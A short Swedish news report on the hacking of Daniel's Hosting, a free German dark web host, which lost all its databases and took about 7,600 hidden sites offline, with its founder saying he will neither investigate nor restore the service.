ZDNet rapporterar att den stora tyska darknet-operatören Danielx27s Hosting (DH) har hackats. Detta har lett till att tusentals webbplatser som drev sina webbplatser på dark web via DH nu inte längre går att komma åt. DH anses vara den största gratistjänsten för dark web-sidor på nätet och enligt ZDNet ska runt 7600 dark web-sajter försvunnit från darknet när DH hackades. Enligt Daniel Winzen som grundat och driver DH så ska någon obehörig tagit sig in i DH:s system och där raderat alla databaser som användes av de webbplatser som nu försvunnit. Då DH är designat för att inte ta några backupper så gick det heller inte att återskapa de nu raderade webbplatserna när det hela väl upptäcktes. Winzen verkar inte ha några större planer på att undersöka hur obehöriga kunde ta sig in i systemet då DH är ett hobbyprojekt som han driver på sin fritid. Han kommer inte heller lägga någon tid på att dra igång DH inom den närmaste framtiden utan tjänsten kommer att förbli nere. Det innebär med andra ord att de över 7000 tjänster och webbplatser som tidigare använt DH för att driva sina tjänster på darknet nu får vända sig till någon annan leverantör. Tumnagel
43.6°
+
Wille Wilhelmsson
0
Nästa sida